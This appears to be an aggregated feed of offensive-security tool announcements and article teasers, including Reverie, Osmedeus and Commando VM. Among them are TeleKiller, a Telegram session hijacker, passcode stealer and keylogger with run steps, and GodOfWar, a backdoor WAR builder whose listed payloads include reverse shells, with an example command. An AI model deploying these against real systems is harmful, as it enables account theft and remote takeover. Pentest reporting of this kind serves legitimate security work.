Reverie – Automated Pentest Tools Designed For Parrot Linux

Automated Pentest Tools Designed For Parrot Linux.this tool will make your basic pentesting task like Information Gathering, Security Auditing, And Reporting so this tool will do every task fully automatic.Usage GuideDownload / Clone~# git clone https://github.com/baguswiratmaadi/reverieGo Inside reverie Dir~# cd reverieGive Permission To reverie~# chmod 777 *.shRun reverie without install~# ./reverie.shIf you want to install reverie~# ./install.shChangelog1.0 First Release 1.1 Fixing Error In Nikto Command Line Pentest Tools Auto Executed With ReverieWhois LookupDNSwalkNmapDmitryWhatwebwafw00fLoad Balancing DetectorSSLyzeTLSSledAutomaterNiktoAnd More Tool SoonScreenshotthis is preview of Reverie Auto PentestTools Preview Output ResultReport In HTML DisclaimerDo not scan government and private IT objects without legal permission.Do At Your Own RiskDownload Reverie

Link: http://feedproxy.google.com/~r/PentestTools/~3/I5j5E3B9o2w/reverie-automated-pentest-tools.html

TeleKiller – A Tool Session Hijacking And Stealer Local Passcode Telegram Windows

A Tools Session Hijacking And Stealer Local passcode Telegram Windows.Features :Session HijackingStealer Local PasscodeKeyloggerShellBypass 2 Step VerificationBypass Av (Coming Soon)Installation Windowsgit clone https://github.com/ultrasecurity/TeleKiller.gitcd TeleKillerpip install -r requirements.txtpython TeleKiller.pyDependency :python 2.7pyHookpywin32Video TutorialOperating Systems TestedWindows 10Windows 8.1Windows 8Windows 7ContactWebSite Ultra Security Team: https://ultrasec.orgChannel Telegram: https://t.me/UltraSecurityThanks toMilad RanjbarMrQadirDownload TeleKiller

Link: http://www.kitploit.com/2019/04/telekiller-tool-session-hijacking-and.html

GodOfWar – Malicious Java WAR Builder With Built-In Payloads

A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby.FeaturesPreexisting payloads. (try -l/–list)cmd_getfilebrowserbind_shellreverse_shellreverse_shell_uiConfigurable backdoor. (try –host/-port)Control over payload name.To avoid malicious name after deployment to bypass URL name signatures.Installation$ gem install godofwarUsage$ godofwar -h Help menu: -p, –payload PAYLOAD Generates war from one of the available payloads. (check -l/–list) -H, –host IP_ADDR Local or Remote IP address for the chosen payload (used with -p/–payload) -P, –port PORT Local or Remote Port for the chosen payload (used with -p/–payload) -o, –output [FILE] Output file and the deployment name. (default is the payload original name. check ‘-l/–list’) -l, –list list all available payloads. -h, –help Show this help message.ExampleList all payloads$ godofwar -l├── cmd_get│   └── Information:│ ├── Description: Command execution via web interface│ ├── OS: any│ ├── Settings: {“false"=>"No Settings required!"}│ ├── Usage: http://host/cmd.jsp?cmd=whoami│ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get├── filebrowser│   └── Information:│ ├── Description: Remote file browser, upload, download, unzip files and native command execution│ ├── OS: any│ &#9500 ;── Settings: {"false"=>"No Settings required!"}│ ├── Usage: http://host/filebrowser.jsp│ ├── References: ["http://www.vonloesch.de/filebrowser.html"]│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser├── bind_shell│   └── Information:│ ├── Description: TCP bind shell│ ├── OS: any│ ├── Settings: {"port"=>4444, "false"=>"No Settings required!"}│ ├── Usage: http://host/reverse-shell.jsp│ ├── References: ["Metasploit – msfvenom -p java/jsp_shell_bind_tcp"]│ └ ── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell├── reverse_shell_ui│   └── Information:│ ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.│ ├── OS: any│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}│ ├── Usage: http://host/reverse_shell_ui.jsp│ ├── References: []│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui├── reverse_shell│   └── Information:│ ├── De scription: TCP reverse shell. LHOST and LPORT are hardcoded│ ├── OS: any│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}│ ├── Usage: http://host/reverse_shell.jsp│ ├── References: []│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shellGenerate payload with LHOST and LPORTgodofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppyAfter deployment, you can visit your shell on (http://host:8080/puppy/puppy.jsp)ContributingFork it ( https://github.com/KINGSABRI/godofwar/fork ).Create your feature branch (git checkout -b my-new-feature).Commit your changes (git commit -am ‘Add some feature’).Push to the branch (git push origin my-new-feature).Create a new Pull Request.Add More BackdoorsTo contribute by adding more backdoors:create a new folder under payloads directory.put your jsp file under the newly created directory (make it the same directory name).update payloads_info.json file withdescription.supported operating system (try to make it universal though).configurations: default host and port.references: the payload origin or its creator credits.Download Godofwar

Link: http://feedproxy.google.com/~r/PentestTools/~3/48DUIB_ttEQ/godofwar-malicious-java-war-builder.html

Beginner’s Guide to Nessus

In this article, we will learn about Nessus which is a network vulnerability scanner. There are various network vulnerability scanners but Nessus is one of the best because of its most successful GUI. Therefore, it is widely used in multiple organizations. The tools were developed by Renuad Deraison in the year 1998. Table of Content… Continue reading →
The post Beginner’s Guide to Nessus appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/beginners-guide-to-nessus/

Kage: Graphical User Interface for Metasploit

Kage is a GUI for Metasploit RCP servers. It is a good tool for beginners to understand the working of Metasploit as it generates payload and lets you interact with sessions. As this tool is on the process of developing, till now it only supports windows/meterpreter and android/meterpreter.  For it to work, you should have… Continue reading →
The post Kage: Graphical User Interface for Metasploit appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/kage-graphical-user-interface-for-metasploit/

Osmedeus – Fully Automated Offensive Security Tool For Reconnaissance And Vulnerability Scanning

Osmedeus allow you automated run the collection of awesome tools to reconnaissance and vulnerability scanning against the target.How to useIf you have no idea what are you doing just type the command below or check out the Advance Usage./osmedeus.py -t example.comInstallationgit clone https://github.com/j3ssie/Osmedeuscd Osmedeus./install.shThis install only focus on Kali linux, check more install on Wiki pageFeaturesSubdomain Scan.Subdomain TakeOver Scan.Screenshot the target.Basic recon like Whois, Dig info.IP Discovery.CORS Scan.SSL Scan.Headers Scan.Port Scan.Vulnerable Scan.Seperate workspaces to store all scan output and details logging.REST API.SPA Web UI.Slack notifications.DemoScreenshotsContact@j3ssiejjjDownload Osmedeus

Link: http://feedproxy.google.com/~r/PentestTools/~3/DCeXRDXo4J0/osmedeus-fully-automated-offensive.html

Comprehensive Guide on Netcat

This article will provide you with the basic guide of Netcat and how to get a session from it using different methods. Table of Contents: Introduction Features Getting start with NC Connecting to a Server Fetching HTTP header Chatting Creating a Backdoor Verbose Mode Save Output to Disk Port Scanning TCP Delay Scan UDP Scan… Continue reading →
The post Comprehensive Guide on Netcat appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/comprehensive-guide-on-netcat/

Commando VM – The First of Its Kind Windows Offensive Distribution

Welcome to CommandoVM – a fully customized, Windows-based security distribution for penetration testing and red teaming.Installation (Install Script)RequirementsWindows 7 Service Pack 1 or Windows 1060 GB Hard Drive2 GB RAMInstructionsCreate and configure a new Windows Virtual MachineEnsure VM is updated completely. You may have to check for updates, reboot, and check again until no more remainTake a snapshot of your machine!Download and copy install.ps1 on your newly configured machine.Open PowerShell as an AdministratorEnable script execution by running the following command:Set-ExecutionPolicy UnrestrictedFinally, execute the installer script as follows:.\install.ps1You can also pass your password as an argument: .\install.ps1 -password The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work.Installing a new packageCommando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy Github Desktop on your system:cinst githubStaying up to dateType the following command to update all of the packages to the most recent version:cup allInstalled ToolsActive Directory ToolsRemote Server Administration Tools (RSAT)SQL Server Command Line UtilitiesSysinternalsCommand & ControlCovenantPoshC2WMImplantWMIOpsDeveloper ToolsDepGitGoJavaPython 2Python 3 (default)Visual Studio 2017 Build Tools (Windows 10)Visual Studio CodeEvasionCheckPleaseDemiguiseDotNetToJScriptInvoke-CradleCrafterInvoke-DOSfuscationInvoke-ObfuscationInvoke-Phant0mNot PowerShell (nps)PS>AttackPSAmsiPafishmacroPowerLessShellPowerShdllStarFightersExploitationADAPE-ScriptAPI MonitorCrackMapExecCrackMapExecWinDAMPExchange-AD-PrivescFuzzySec’s PowerShell-SuiteFuzzySec’s Sharp-SuiteGenerate-MacroGhostPackRubeusSafetyKatzSeatbeltSharpDPAPISharpDumpSharpRoastSharpUpSharpWMIGoFetchImpacketInvoke-ACLPwnInvoke-DCOMInvoke-PSImageInvoke-PowerThIEfKali Binaries for WindowsLuckyStrikeMetaTwinMetasploitMr. Unikod3r’s RedTeamPowershellScriptsNetshHelperBeaconNishangOrcaPSReflectPowerLurkPowerPrivPowerSploitPowerUpSQLPrivExchangeRulerSharpExchangePrivSpoolSampleUACMEimpacket-examples-windowsvssownInformation GatheringADACLScannerADExplorerADOfflineADReconBloodHoundGet-ReconInfoGoWitnessNmapPowerViewDev branch includedSharpHoundSharpViewSpoolerScannerNetworking ToolsCitrix ReceiverOpenVPNProxycapPuTTYTelnetVMWare Horizon ClientVMWare vSphere ClientVNC-ViewerWinSCPWindumpWiresharkPassword AttacksASREPRoastCredNinjaDSInternalsGet-LAPSPasswordsHashcatInternal-MonologueInveighInvoke-TheHashKeeFarceKeeThiefLAPSToolkitMailSniperMimikatzMimikittenzRiskySPNSessionGopherReverse EngineeringDNSpyFlare-FlossILSpyPEviewWindbgx64dbgUtilities7zipAdobe ReaderAutoITCmderCyberChefGimpGreenshotHashcheckHexchatHxDKeepassMobaXtermMozilla ThunderbirdNeo4j Community EditionPidginProcess Hacker 2SQLite DB BrowserScreentogifShellcode LauncherSublime Text 3TortoiseSVNVLC Media PlayerWinraryEd Graph ToolVulnerability AnalysisEgress-AssessGrouper2zBangWeb ApplicationsBurp SuiteFiddlerFirefoxOWASP ZapWordlistsFuzzDBPayloadsAllTheThingsSecListsDownload Commando-Vm

Link: http://feedproxy.google.com/~r/PentestTools/~3/7vdMiUOLgeU/commando-vm-first-of-its-kind-windows.html

UPDATE: AutoSploit 3.0 – The New Year’s edition

PenTestIT RSS Feed
I wrote about AutoSploit in a post titled AutoSploit = Shodan/Censys/Zoomeye + Metasploit and it’s subsequent update to AutoSploit 2.2. Recently, AutoSploit 3.0 was released. This post tries to describe the changes between the last release and the newest version as this release adds a number of features and bug fixes. This release is codeRead more about UPDATE: AutoSploit 3.0 – The New Year’s edition
The post UPDATE: AutoSploit 3.0 – The New Year’s edition appeared first on PenTestIT.

Link: http://pentestit.com/update-autosploit-3-0-the-new-years-edition/

OSX Exploitation with Powershell Empire

This article is another post in the empire series. In this article, we will learn OSX Penetration testing using empire. Table of Content Exploiting MAC Post Exploitation Phishing Privilege Escalation Sniffing Exploiting MAC Here I’m considering you know PowerShell Empire’s basics, therefore, we will create the listener first using the following commands: [crayon-5c931df0cb99c925497913/] Executing the… Continue reading →
The post OSX Exploitation with Powershell Empire appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/osx-exploitation-with-powershell-empire/